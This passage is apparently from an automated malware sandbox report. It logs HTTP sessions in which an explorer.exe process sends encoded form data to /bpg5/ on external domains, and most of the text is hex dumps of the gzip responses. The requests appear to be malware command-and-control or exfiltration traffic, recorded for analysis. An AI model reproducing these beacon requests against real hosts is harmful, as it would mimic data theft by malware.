                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Server: LiteSpeed
                                                    x-powered-by: PHP/8.1.19
                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                    link: <https://rt66omm.com/wp-json/>; rel="https://api.w.org/"
                                                    content-encoding: gzip
                                                    vary: Accept-Encoding,Accept-Encoding
                                                    x-turbo-charged-by: LiteSpeed
                                                    Data Raw: 31 39 39 64 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd db 8e e4 48 b2 18 f8 2b 3c 95 68 75 46 4f 30 8a 8c 7b 32 bb 4a 07 3a 82 04 69 57 17 68 25 48 42 a3 91 f0 20 3d 22 d8 c5 20 39 24 23 2f 9d 2a 3d 68 5e 76 3f 60 3f 60 a1 4f d0 83 5e f6 49 bf 32 3f 22 98 b9 3b e9 37 32 c8 60 e4 cc 81 a0 69 74 4d 17 c3 dd cc dc dc dc dd cc dc dc ec e7 bf 89 b2 b0 7a cb a9 73 ac 4e c9 d7 9f e1 4f 27 21 e9 e1 cb a7 df c8 a7 af 3f 1f 29 89 be fe 7c a2 15 71 c2 23 29 4a 5a 7d f9 74 ae f6 ee f6 13 ff 9a 92 13 fd f2 e9 39 a6 2f 79 56 54 9f 9c 30 4b 2b 9a 56 5f 3e bd c4 51 75 fc 12 d1 e7 38 a4 2e fe 65 ea c4 69 5c c5 24 71 cb 90 24 f4 8b 3f f3 a6 8e e8 e9 ee e3 ea 4b 98 3d d3 42 85 5c d0 3d 2d 0a 5a 48 90 d3 cc 15 5f dd 97 23 4d dd 28 7b 49 0f 05 89 a8 da 75 9f 15 27 52 b9 11 ad 68 58 c5 59 2a 81 a8 68 42 f3 63 96 d2 2f 69 f6 e9 eb cf 49 9c 7e 73 0a 9a 7c f9 94 17 34 cc d2 94 86 95 13 a5 a5 9b 03 a2 2a 3c 7e 72 8e 05 dd 7f f9 f4 f9 f3 cb cb cb ec 90 65 87 84 56 e4 70 22 29 39 d0 62 16 66 a7 6b a1 b8 24 25 c9 5b 15 87 e5 70 28 e4 37 f2 ca 89 21 79 7c 05 80 30 4a 7f 2b 67 61 92 9d a3 7d 42 0a 3a 9c 84 9c 1c 28 89 e6 9c 8a f2 2d 8d e2 90 00 b3 87 83 62 5c 25 51 39 3b cc a2 ec bc 4b 68 98 c4 e1 b7 59 4a ab 61 cc ad f2 f0 16 f4 90 68 1c 19 28 29 65 45 aa 38 1c ce 8c b0 a4 7c 0c c3 fb ee b3 b4 2a af 47 cd bb a3 8c 5f 29 56 a7 72 f6 c7 33 49 ab 92 16 cf 57 08 55 49 c3 73 41 67 87 82 3c 93 8a 5c b1 bc c2 28 9d c9 b2 58 bd c4 a7 c3 70 46 02 98 df ca 88 26 f1 73 31 5c 0c e3 13 39 d0 d2 dd d3 59 59 26 2e ff 1b 39 91 df af 59 1c 61 76 ca 13 8a 0b eb 5a 10 a7 d9 89 46 31 71 af ed 1f cf 4e 59 79 8c 4f d9 70 46 92 53 32 7b 26 c9 99 86 d9 e9 44 8b f0 0a 99 88 48 12 de 00 c6 ee 32 8c 24 23 d1 27 87 94 5f 3e c1 4a f8 e4 c0 e9 c8 fe fb f3 4b b6 df 8b a3 e0 58 55 79 f0 f9 73 51 ad d7 d9 e9 04 3c f9 fc 92 bb fc f8 fb 5c 1d e9 89 96 9f c3 2c cc b2 d4 3d 91 b2 a2 c5 e7 17 ba c3 c5 f5 39 0e b3 53 96 a5 9f 95 bf cd 18 f4 b0 c8 ca 32 2b e2 43 9c 6a 07 d3 05 c2 e6 b7 a0 0c 28 22 2f b4 cc 4e 94 53 27 7d 71 f9 00 90 d2 f9 3f 7c fe b2 9c 6d 66 de 27 47 21 b9 8a ab 84 7e 5d 7a 4b e7 5f fe ab 7f eb fc 93 7f f5 ef fe e5 3f 76 fe 93 f3 6f b2 73 45 9d f5 da c9 52 e7 5f bc 39 ff 22 4e a3 9f 3f b3 a6 4c bb 40 3d e2 c7 22 db 65 55 f9 63 ad 45 fc 78 22 af 6c e9 c0 51 0c ba 42 90 90 e2 40 7f fc cc d5 8f bc c8 72 5a 54 6f 5f 3e 65 87 00 66 4a d6 40 e8 ae 8c ab 5a 29 50 9a 46 b4 0c 8b 38 d7 d4 82 7f 12 a7 11 50 58 53 fb ef 8f a4 72 fe 63 76 76 fe cf ac ac fe 46 a8 17 2a 52 18 af 84 55 1d b9 f3 9f 1c db d8 ad 90 ce 45 22 c1 01 f9 2a 35 01
                                                    Data Ascii: 199d7H+<huFO0{2J:iWh%HB =" 9$#/*=h^v?`?`O^I2?";72`itMzsNO'!?)|q#)JZ}t9/yVT0K+V_>Qu8.ei\$q$?K=B\=-ZH_#M({Iu'RhXY*hBc/iI~s|4*<~reVp")9bfk$%[p(7!y|0J+ga}B:(-b\%Q9;KhYJah()eE8|*G_)Vr3IWUIsAg<\(XpF&s1\9YY&.9YavZF1qNYyOpFS2{&DH2$#'_>JKXUysQ<\,=9S2+Cj("/NS'}q?|mf'G!~]zK_?vosER_9"N?L@="eUcEx"lQB@rZTo_>efJ@Z)PF8PXSrcvvF*RUE"*5
                                                    May 19, 2023 17:52:13.369570971 CEST60INData Raw: 5b 7a cb cf d6 ae b8 bb 68 9d 07 0a 67 19 16 94 a6 e5 31 ab 66 bf e5 07 2b 16 e0 e6 13 4c 94 84 c9 32 b1 d6 be 49 06 3a 9f d4 f1 37 f2 f4 cf ff b5 d9 94 14 55 1c 26 34 c8 cf bb 24 2e 8f 34 7a aa 62 05 e1 27 31 f5 4c f3 ac 5e e2 aa a2 45 10 92 22
                                                    Data Ascii: [zhg1f+L2I:7U&4$.4zb'1L^E"oO(-O=7zDpB&N$kiWueGSE^k-lk~qJO$hMyEY|rpz|sO?we}=)>@7h/
                                                    May 19, 2023 17:52:13.369631052 CEST62INData Raw: 95 5f 2d 52 3b 4c 79 2d d9 16 d1 2a 14 0a b6 69 bb f0 20 17 3a 7e 07 39 ed f8 99 4d e0 c4 d8 25 15 55 9c db 19 00 2a 20 e7 2a 13 86 07 e2 66 5f ba 54 bf de ca ae b1 dd 96 bd bb f2 53 42 d3 a7 db b5 45 59 2d be 81 f6 29 b3 4b 1a 05 f8 76 d3 88 74
                                                    Data Ascii: _-R;Ly-*i :~9M%U* *f_TSBEY-)KvtS:@7jpT/h{[JXFo*dK,IH^R?d#r\/`6FJxwQNP:\%Fj`JhjE:8HQTqIHDS&x-v
                                                    May 19, 2023 17:52:13.369678020 CEST63INData Raw: 76 29 8b bc b9 02 93 93 c4 92 29 62 ca 49 d3 30 4b 5a f4 f4 4b f8 99 d1 31 2f 34 03 5d 1d f1 25 3b 4e 1c c9 82 ee eb 2e 39 dc 53 f6 3b 3c cb 13 b7 79 5c 23 97 be 74 70 40 8e 56 b2 1b 8f f8 d8 4f d9 8a 9e 69 c1 82 fd 15 97 19 9b 7f f9 1e 36 cf ca
                                                    Data Ascii: v))bI0KZK1/4]%;N.9S;<y\#tp@VOi6CV}vB7J%`MH?*Rh~7OR?}\I(vn@ ;Oiq4UN>A0i`>wtr0N[{K-:vekSs/`$mz'!euM[l
                                                    May 19, 2023 17:52:13.369749069 CEST64INData Raw: 31 15 4a cb 3e 74 f4 9e 09 0e f9 f2 64 c8 0d fb 50 30 60 2e 58 6c ff e5 b9 90 da 99 12 41 d3 68 dc aa e0 d0 7b cc 86 d2 b2 1f 25 bd e7 83 c3 be 3c 1f 72 c3 7e 34 5c 98 11 29 dd b2 c8 f6 28 b6 23 bc 06 e1 a9 98 f5 df 86 9f de 1d c0 46 21 e2 cf 6e
                                                    Data Ascii: 1J>tdP0`.XlAh{%<r~4\)(#F!n+!9@;8qD3vtkU.!N?c"GOg+1__l+x3Fh~`qyoyA5V$y5IXei^P_"#F@&z@g3~
                                                    May 19, 2023 17:52:13.369821072 CEST66INData Raw: 2a 59 81 2b a1 07 41 a5 d7 d9 06 6a c0 ce 36 72 3e c4 da 26 32 14 40 5b 30 cf fc 16 cb ae 99 16 26 f7 a3 04 50 9d 9d b1 0b 49 13 e7 b1 e0 4c e2 b4 94 b5 c3 d8 79 95 3c 4b 95 98 51 67 13 65 5c 06 70 1d ae 2b c2 22 cb 73 1a d9 35 22 70 d8 df 14 de
                                                    Data Ascii: *Y+Aj6r>&2@[0&PILy<KQge\p+"s5"pB7S'q(q}2AgI'8gEXpDz{4N!k:a5164x\F{,2wO]U~qKZ]^+kd*H(X@z^5wuH
                                                    May 19, 2023 17:52:13.369887114 CEST67INData Raw: 7c ed 1e c5 1e ec 0c 13 8c 81 5b d4 e8 d1 36 8c 7e 97 ce a0 5e 07 be 2d 9f 65 bb ce d5 d3 fb d5 e3 8c 93 12 78 f6 70 43 15 d9 39 6f b1 ac 8e 3e ca 91 54 ad e6 38 37 be 2c 8c 2f 4b e3 cb ca f8 b2 d6 be bc d7 da f9 6c 0e ef 19 e7 b3 05 04 64 48 7c
                                                    Data Ascii: |[6~^-expC9o>T87,/KldH|f@]xL*ISI76 ]'+3u?'{/z#|1UqEJ#sX@C>*j5e!3V8f.6R[nG4`(1'oO2Rzo|3
                                                    May 19, 2023 17:52:13.369952917 CEST68INData Raw: de 23 46 f2 a3 13 9e c1 12 23 cc f3 22 bd 6c 83 6a 19 fd 15 f3 d7 09 cf a0 57 4d 19 7d 71 02 59 7f 14 5c b6 22 02 9f 2d 85 22 7b 09 fc 3a d6 e6 0a 99 78 57 97 a2 8c 62 2e a3 a8 15 2a 67 fb c3 e3 4b 56 44 ee ae a0 e4 5b 80 7f ba f0 c1 8a bc 65 0d
                                                    Data Ascii: #F#"ljWM}qY\"-"{:xWb.*gKVD[eLye[VOOH[nIiIGGQBlHV;Ixi%3efVWL?_CYCRAqyPy<Hk~Z68hY>_OM}&%yIF
                                                    May 19, 2023 17:52:13.369999886 CEST70INData Raw: 37 1f aa 4b 9f 21 9c 11 23 05 ad c3 96 c6 98 c3 95 09 78 51 ad 1e 36 a6 37 92 38 55 aa 4b ca 14 35 25 09 dd 30 c9 4a b9 2a 70 5b b3 0c 23 93 7b 41 14 4d 45 65 d9 16 22 25 22 a2 98 24 d9 e1 fd 40 f2 fa 91 b7 51 f7 4b 32 ce d4 5b 7c fb dc 83 8c 38
                                                    Data Ascii: 7K!#xQ678UK5%0J*p[#{AMEe"%"$@QK2[|8d:>;P3X7\bmp@;R`PzbJmZ+sw-lY!"Ztb gFmK-e,gHc_
                                                    May 19, 2023 17:52:13.370066881 CEST71INData Raw: f0 bc 7f 47 0a 67 20 5b 38 0a e9 b1 d8 72 dd 79 3b 8d 99 55 3e 06 f3 62 9e bf 7e ff 7e ac 4e 2c ed 4c 83 e5 bd 76 25 b3 77 28 d6 05 6e 15 01 6e 55 b2 b3 53 40 61 77 6e 4d fa 0a 39 a9 85 51 a9 ad 99 9a 2e 04 11 2d c3 22 ce f1 49 fc 45 7f 93 04 68
                                                    Data Ascii: Gg [8ry;U>b~~N,Lv%w(nnUS@awnM9Q.-"IEh]]Cj8rlszAy"II1!^9!7@EH{!Jb_%Vl2*ZiGc|1AE=O8[7y=HP=1!)]*ap}iLDsi0u
                                                    May 19, 2023 17:52:13.654918909 CEST72INData Raw: d7 b1 b9 bd 7b c8 a4 cb 5b 0a 57 ea d1 e2 63 9b a9 a6 e6 af 55 57 42 3d 36 1b 59 12 12 a5 f6 d2 dc f0 18 b7 9b 64 bd 11 80 64 70 5f a4 7c 51 a1 85 6f 68 71 d6 aa 60 b5 0b 33 ee 17 bc f8 83 91 02 b9 c3 3c 84 71 09 a1 46 03 c9 16 3a ca 76 23 0e 5d
                                                    Data Ascii: {[WcUWB=6Yddp_|Qohq`3<qF:v#];kRpTT{u`Af;<cmQ+(4pdcGKOSkFcXh.)RZz+BLL77'8ga'`z>hQ^V:5nQWSWJJS6%H


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    12192.168.2.449711118.27.125.17280C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    May 19, 2023 17:52:15.788387060 CEST168OUTPOST /bpg5/ HTTP/1.1
                                                    Host: www.rt66omm.com
                                                    Connection: close
                                                    Content-Length: 189
                                                    Cache-Control: no-cache
                                                    Origin: http://www.rt66omm.com
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.rt66omm.com/bpg5/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Data Raw: 38 6d 42 57 6d 50 6e 3d 62 6e 6a 75 75 75 38 66 33 6b 52 66 64 50 35 38 42 6d 30 74 43 37 68 34 74 4b 56 58 35 51 55 31 37 6d 37 68 4a 46 36 66 48 2d 51 69 76 58 31 72 4a 54 4e 53 73 64 78 36 70 56 6a 67 48 61 28 74 54 4e 4f 43 28 6c 74 57 33 6a 51 4c 35 31 4a 4f 67 37 64 30 45 5f 57 38 6d 33 34 50 76 45 48 49 64 73 68 4f 4a 4c 6a 69 31 73 43 43 30 46 6a 2d 6a 65 62 70 37 47 4e 78 4d 31 73 51 76 6f 71 54 34 43 39 34 69 6f 45 5f 51 47 61 51 4a 4a 68 62 65 33 33 6c 42 4c 64 4e 72 58 5a 4b 77 63 4c 44 78 39 7e 59 38 45 7e 4f 73 58 70 41 30 6c 48 30 36 51 29 2e 00 00 00 00 00 00 00 00
                                                    Data Ascii: 8mBWmPn=bnjuuu8f3kRfdP58Bm0tC7h4tKVX5QU17m7hJF6fH-QivX1rJTNSsdx6pVjgHa(tTNOC(ltW3jQL51JOg7d0E_W8m34PvEHIdshOJLji1sCC0Fj-jebp7GNxM1sQvoqT4C94ioE_QGaQJJhbe33lBLdNrXZKwcLDx9~Y8E~OsXpA0lH06Q).
                                                    May 19, 2023 17:52:16.163568974 CEST169INHTTP/1.1 404 Not Found
                                                    Date: Fri, 19 May 2023 15:52:15 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Server: LiteSpeed
                                                    x-powered-by: PHP/8.1.19
                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                    link: <https://rt66omm.com/wp-json/>; rel="https://api.w.org/"
                                                    content-encoding: gzip
                                                    vary: Accept-Encoding,Accept-Encoding
                                                    x-turbo-charged-by: LiteSpeed
                                                    Data Raw: 33 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd db 8e e4 48 b2 18 f8 2b 3c 95 68 75 46 4f 30 8a 8c 7b 32 bb 4a 07 3a 82 04 69 57 17 68 25 48 42 a3 91 f0 20 3d 22 d8 c5 20 39 24 23 2f 9d 2a 3d 68 5e 76 3f 60 3f 60 a1 4f d0 83 5e f6 49 bf 32 3f 22 98 b9 3b e9 37 32 c8 60 e4 cc 81 a0 69 74 4d 17 c3 dd cc dc dc dc dd cc dc dc ec e7 bf 89 b2 b0 7a cb a9 73 ac 4e c9 d7 9f e1 4f 27 21 e9 e1 cb a7 df c8 a7 af 3f 1f 29 89 be fe 7c a2 15 71 c2 23 29 4a 5a 7d f9 74 ae f6 ee f6 13 ff 9a 92 13 fd f2 e9 39 a6 2f 79 56 54 9f 9c 30 4b 2b 9a 56 5f 3e bd c4 51 75 fc 12 d1 e7 38 a4 2e fe 65 ea c4 69 5c c5 24 71 cb 90 24 f4 8b 3f f3 a6 8e e8 e9 ee e3 ea 4b 98 3d d3 42 85 5c d0 3d 2d 0a 5a 48 90 d3 cc 15 5f dd 97 23 4d dd 28 7b 49 0f 05 89 a8 da 75 9f 15 27 52 b9 11 ad 68 58 c5 59 2a 81 a8 68 42 f3 63 96 d2 2f 69 f6 e9 eb cf 49 9c 7e 73 0a 9a 7c f9 94 17 34 cc d2 94 86 95 13 a5 a5 9b 03 a2 2a 3c 7e 72 8e 05 dd 7f f9 f4 f9 f3 cb cb cb ec 90 65 87 84 56 e4 70 22 29 39 d0 62 16 66 a7 6b a1 b8 24 25 c9 5b 15 87 e5 70 28 e4 37 f2 ca 89 21 79 7c 05 80 30 4a 7f 2b 67 61 92 9d a3 7d 42 0a 3a 9c 84 9c 1c 28 89 e6 9c 8a f2 2d 8d e2 90 00 b3 87 83 62 5c 25 51 39 3b cc a2 ec bc 4b 68 98 c4 e1 b7 59 4a ab 61 cc ad f2 f0 16 f4 90 68 1c 19 28 29 65 45 aa 38 1c ce 8c b0 a4 7c 0c c3 fb ee b3 b4 2a af 47 cd bb a3 8c 5f 29 56 a7 72 f6 c7 33 49 ab 92 16 cf 57 08 55 49 c3 73 41 67 87 82 3c 93 8a 5c b1 bc c2 28 9d c9 b2 58 bd c4 a7 c3 70 46 02 98 df ca 88 26 f1 73 31 5c 0c e3 13 39 d0 d2 dd d3 59 59 26 2e ff 1b 39 91 df af 59 1c 61 76 ca 13 8a 0b eb 5a 10 a7 d9 89 46 31 71 af ed 1f cf 4e 59 79 8c 4f d9 70 46 92 53 32 7b 26 c9 99 86 d9 e9 44 8b f0 0a 99 88 48 12 de 00 c6 ee 32 8c 24 23 d1 27 87 94 5f 3e c1 4a f8 e4 c0 e9 c8 fe fb f3 4b b6 df 8b a3 e0 58 55 79 f0 f9 73 51 ad d7 d9 e9 04 3c f9 fc 92 bb fc f8 fb 5c 1d e9 89 96 9f c3 2c cc b2 d4 3d 91 b2 a2 c5 e7 17 ba c3 c5 f5 39 0e b3 53 96 a5 9f 95 bf cd 18 f4 b0 c8 ca 32 2b e2 43 9c 6a 07 d3 05 c2 e6 b7 a0 0c 28 22 2f b4 cc 4e 94 53 27 7d 71 f9 00 90 d2 f9 3f 7c fe b2 9c 6d 66 de 27 47 21 b9 8a ab 84 7e 5d 7a 4b e7 5f fe ab 7f eb fc 93 7f f5 ef fe e5 3f 76 fe 93 f3 6f b2 73 45 9d f5 da c9 52 e7 5f bc 39 ff 22 4e a3 9f 3f b3 a6 4c bb 40 3d e2 c7 22 db 65 55 f9 63 ad 45 fc 78 22 af 6c e9 c0 51 0c ba 42 90 90 e2 40 7f fc cc d5 8f bc c8 72 5a 54 6f 5f 3e 65 87 00 66 4a d6 40 e8 ae 8c ab 5a 29 50 9a 46 b4 0c 8b 38 d7 d4 82 7f 12 a7 11 50 58 53 fb ef 8f a4 72 fe 63 76 76 fe cf ac ac fe 46 a8 17 2a 52 18 af 84 55 1d b9 f3 9f 1c db d8 ad 90 ce 45 22 c1 01 f9 2a 35 01 5b 7a
                                                    Data Ascii: 3e4H+<huFO0{2J:iWh%HB =" 9$#/*=h^v?`?`O^I2?";72`itMzsNO'!?)|q#)JZ}t9/yVT0K+V_>Qu8.ei\$q$?K=B\=-ZH_#M({Iu'RhXY*hBc/iI~s|4*<~reVp")9bfk$%[p(7!y|0J+ga}B:(-b\%Q9;KhYJah()eE8|*G_)Vr3IWUIsAg<\(XpF&s1\9YY&.9YavZF1qNYyOpFS2{&DH2$#'_>JKXUysQ<\,=9S2+Cj("/NS'}q?|mf'G!~]zK_?vosER_9"N?L@="eUcEx"lQB@rZTo_>efJ@Z)PF8PXSrcvvF*RUE"*5[z
                                                    May 19, 2023 17:52:16.163624048 CEST170INData Raw: cb cf d6 ae b8 bb 68 9d 07 0a 67 19 16 94 a6 e5 31 ab 66 bf e5 07 2b 16 e0 e6 13 4c 94 84 c9 32 b1 d6 be 49 06 3a 9f d4 f1 37 f2 f4 cf ff b5 d9 94 14 55 1c 26 34 c8 cf bb 24 2e 8f 34 7a aa 62 05 e1 27 31 f5 4c f3 ac 5e e2 aa a2 45 10 92 22 92 a0
                                                    Data Ascii: hg1f+L2I:7U&4$.4zb'1L^E"oO(-O=7zDpB&N$kiWueGSE^k-lk~qJO$
                                                    May 19, 2023 17:52:16.163659096 CEST171INData Raw: 31 36 61 30 0d 0a a9 68 91 92 8a 8a 4d 9f e4 79 c2 f5 d9 cf 45 59 fe e1 f5 94 7c 72 70 7a bf 7c b2 08 be f3 0f 0a f2 c7 73 f6 e8 fc f9 4f ff ef 9f ff cb 7f fd f3 9f fe ff 3f ff e9 ff 91 77 65 7d 3d ef 29 8d 3e 83 40 37 06 c8 ed 68 f8 2f ff ed cf
                                                    Data Ascii: 16a0hMyEY|rpz|sO?we}=)>@7h/?}0K:e~QH)o<b/S?|G_~d-0+[?3l_a=Tb9zQ%=5Je~)-HW?95f=<<uROfB^
                                                    May 19, 2023 17:52:16.163693905 CEST172INData Raw: 2f e5 ed 60 00 8c 36 46 02 e5 9d c8 9d 4a f0 9a 1f 78 77 51 d4 4e 03 8a 50 c3 3a ec 5c 9f c5 1c c0 25 46 6a 0a 07 c0 60 4a 82 e8 68 18 b0 1a 1f 6a ad 45 3a b8 9d ea 38 91 48 09 8c 51 54 f4 90 15 71 0f 7f 49 48 44 53 26 e0 78 e8 f1 dd 80 2d fe b9
                                                    Data Ascii: /`6FJxwQNP:\%Fj`JhjE:8HQTqIHDS&x-v^>Y:yDSu2${q_K#xqSTR9ySI9tROH}5loo<4-_N3ws3RJFnu,dP.`,
                                                    May 19, 2023 17:52:16.163753033 CEST174INData Raw: bd 87 69 e3 97 8e 0c 1e 71 c6 34 55 8f e6 4e 3e b5 41 30 69 92 ee f4 15 b1 ad c1 eb a0 60 3e 77 74 9f 15 72 30 07 4e 5b 7b 4b 13 2d bf df 90 fc 1f 3a 76 65 6b 7f a6 c5 d3 53 73 c5 a1 2f 0f b3 ad 60 99 24 6d 7a 27 21 65 75 8c 11 0e a2 0b 4d 5b 8f
                                                    Data Ascii: iq4UN>A0i`>wtr0N[{K-:vekSs/`$mz'!euM[ldyG$`jV6Yr#W4Tw1vW\wes>8OVcf5e>9O^yM*>[x'6e`d-POnO43
                                                    May 19, 2023 17:52:16.163788080 CEST175INData Raw: 33 18 e0 46 fa 68 7e 60 e9 71 03 af 79 6f 79 f1 41 8e 35 e5 81 1e 56 98 93 82 24 09 79 35 8e 49 10 9f b6 1f 9f 58 65 18 69 5e 50 a2 ea e6 fd d8 aa f4 91 5f 80 91 aa 22 e1 11 92 23 04 fb f8 95 46 f2 1b c6 82 e6 94 40 26 09 c8 7a 40 89 92 67 16 12
                                                    Data Ascii: 3Fh~`qyoyA5V$y5IXei^P_"#F@&z@g3~-:[Y@vb#wHbQ!S=_gdA^oi[a,\L[deKI;oZ#6,<j];$8TPi
                                                    May 19, 2023 17:52:16.163817883 CEST176INData Raw: cc c2 e8 82 04 b6 86 92 78 5c 84 46 a0 7b c4 2c e2 b5 86 32 eb 93 77 9d 4f 5d f6 55 8d 7e 71 4b f6 5a 80 5d c7 5e 0b a0 2b d9 6b 81 64 b0 17 2a c3 48 15 ba 17 0b 28 b0 be 58 40 c9 ec d9 7a 8d 05 d8 87 d9 5e 35 77 97 b7 e4 ae 05 d8 75 dc b5 00 ba
                                                    Data Ascii: x\F{,2wO]U~qKZ]^+kd*H(X@z^5wuHJnTjt%S-.2zy%Ou<Hxgjnn]kt%w-.rw9oWqwWsw{KZ]]+ktqv>y)5ss@aP!--n`[
                                                    May 19, 2023 17:52:16.163855076 CEST177INData Raw: 31 36 61 30 0d 0a 28 9d 62 58 7d 39 fa d5 72 3d d6 bb 6f 14 3f e3 9d 93 db 39 26 f1 28 52 8a ab 1c c8 db 41 f1 17 7f 13 9f 20 6b 09 49 2b fb 63 d5 a1 b8 a5 3b de 26 23 eb 5f 2d 3c c1 5f e4 af ea 6b 53 b5 4a 26 0f 56 58 7b 3f 3c da 63 15 3c 67 9b
                                                    Data Ascii: 16a0(bX}9r=o?9&(RA kI+c;&#_-<_kSJ&VX{?<c<g]a#fOI0nIi1p9\4Hge:@gXkfeF3]#E8 ?6Y(]7qW1I(X:> ?KN>h)zwTae
                                                    May 19, 2023 17:52:16.163889885 CEST178INData Raw: d4 7a 25 5e 39 3f 4a 4a 23 37 90 e6 d8 4a 79 1f 87 af 89 f8 8d 2c fe 2c 9d 36 9c 84 3c 2b db d6 69 4b e3 c6 1c 50 c3 53 e6 ad e0 65 33 81 d3 87 0b b7 a3 47 6d f7 ca 64 3e 3d 25 71 59 bd c3 1f fc 48 c0 85 76 69 33 c0 21 1a 7b 14 7e 65 10 9d 24 7e
                                                    Data Ascii: z%^9?JJ#7Jy,,6<+iKPSe3Gmd>=%qYHvi3!{~e$~JPmK;cv0k0ke](0+zg60os@ yemHv_)5I^'l(FR7]y8_]"QLR?{@OE&@or0},]Mz5ZC-{n2D$e<=
                                                    May 19, 2023 17:52:16.164182901 CEST180INData Raw: f8 52 f7 d8 8b 38 66 fc e4 24 8c ab b7 c0 33 cd a0 ac 8c b1 36 5e 93 96 37 cb d9 cb 19 cc 1a cc 7e e4 05 00 9c 99 5f 3a b0 19 92 e2 11 ca 06 ec e2 04 a0 72 8b 8a 6d 69 5e 5d 87 7b 7e 2b 76 7d 6d d5 c8 da 7f 31 75 42 60 96 fc 1a e8 ef 05 75 17 24
                                                    Data Ascii: R8f$36^7~_:rmi^]{~+v}m1uB`u$30,Y,VR4W\YrynsY'b<38<6[D!oO:e}GrW:F,-`GSPd'vggbYNSpI~2.NYQ0|
                                                    May 19, 2023 17:52:16.441699982 CEST181INData Raw: d6 4a 1e b3 3c d9 27 11 0f 52 56 a4 8a c3 2b 6e 34 3f 8a 61 56 1f ef 5f 59 e0 e5 1d c5 f0 91 29 2e 79 9b 93 f2 2f ca 29 93 3c 79 db 34 0e 5e 91 37 3d 9f ce d5 c7 b8 1f bd 89 5a 77 36 ed 36 cf f6 8a fb af 47 d7 5f 67 af b5 da 61 7f 1d 52 9a 6d 5f
                                                    Data Ascii: J<'RV+n4?aV_Y).y/)<y4^7=Zw66G_gaRm_~Smj@L#+ZTdm(V\}}<3*mc:V\6Wd)-'ni`F4ZC2yyGjM,=IOKmgwb2GSBv4aA


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    13192.168.2.449712118.27.125.17280C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    May 19, 2023 17:52:18.600258112 CEST278OUTGET /bpg5/?8mBWmPn=WlLOtZde/S0Bb5podjoZPKpN16VixTIJ6XzrElaVf+c4mV5kUnhNlslOlX/mHpTHfJOtj0AP0RUV6kopxuhfKJOii3EjlU32Tg==&JBfKk=_uLb4J-vJhW8 HTTP/1.1
                                                    Host: www.rt66omm.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 19, 2023 17:52:18.944601059 CEST279INHTTP/1.1 301 Moved Permanently
                                                    Date: Fri, 19 May 2023 15:52:18 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 0
                                                    Connection: close
                                                    Server: LiteSpeed
                                                    x-powered-by: PHP/8.1.19
                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                    x-redirect-by: WordPress
                                                    location: http://rt66omm.com/bpg5/?8mBWmPn=WlLOtZde/S0Bb5podjoZPKpN16VixTIJ6XzrElaVf+c4mV5kUnhNlslOlX/mHpTHfJOtj0AP0RUV6kopxuhfKJOii3EjlU32Tg==&JBfKk=_uLb4J-vJhW8
                                                    vary: Accept-Encoding
                                                    x-turbo-charged-by: LiteSpeed


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    14192.168.2.449713183.90.228.4680C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    May 19, 2023 17:52:24.544229031 CEST281OUTPOST /bpg5/ HTTP/1.1
                                                    Host: www.haynicorpon.biz
                                                    Connection: close
                                                    Content-Length: 1485
                                                    Cache-Control: no-cache
                                                    Origin: http://www.haynicorpon.biz
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.haynicorpon.biz/bpg5/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Data Raw: 38 6d 42 57 6d 50 6e 3d 4a 33 4e 6b 78 76 66 41 6d 32 54 4c 34 33 7e 30 73 38 58 67 52 44 6a 58 54 33 52 75 47 6b 67 66 32 30 49 50 78 77 33 65 7e 68 4e 5f 44 63 4e 4c 65 35 50 4f 36 4e 72 36 43 5a 33 33 71 66 31 38 4c 34 4e 75 49 42 50 43 36 2d 35 34 28 4b 49 6f 65 61 76 49 44 5a 4a 58 47 77 6b 31 39 36 57 43 32 55 58 68 45 41 54 6d 68 75 71 39 6f 4b 4a 74 77 68 5a 2d 59 71 6d 37 6d 58 59 37 71 75 49 54 73 6e 30 47 58 75 34 39 36 4c 45 50 34 59 4a 34 59 79 4c 4d 6f 64 78 36 6f 71 53 6e 38 50 56 36 75 65 71 64 70 68 33 6e 50 63 48 45 41 55 57 37 4a 39 45 6c 63 35 72 4a 70 78 55 52 74 73 52 4c 35 59 67 67 55 73 39 4c 66 33 59 36 45 61 36 77 6e 36 6a 6c 71 30 39 49 58 36 33 34 66 63 48 39 64 43 4f 47 72 34 52 77 6a 45 4d 31 36 58 63 38 53 61 57 43 67 64 53 4a 70 6e 38 37 55 4e 65 72 36 71 51 57 63 4f 53 51 54 67 36 76 6d 57 79 61 39 6c 5a 77 39 55 75 76 36 53 53 4d 56 57 41 6f 51 4d 63 47 50 48 28 2d 6b 63 33 6e 76 62 52 79 57 35 44 6d 75 49 49 31 36 58 46 4d 78 6d 55 63 47 74 50 4a 55 6b 6c 57 43 4f 73 4c 45 4a 28 7a 75 5a 6a 52 6b 49 6c 44 71 36 64 35 32 67 34 65 59 2d 38 71 39 32 5a 72 55 46 46 38 65 6d 62 4d 47 56 52 33 48 41 71 75 52 47 59 43 49 49 37 4f 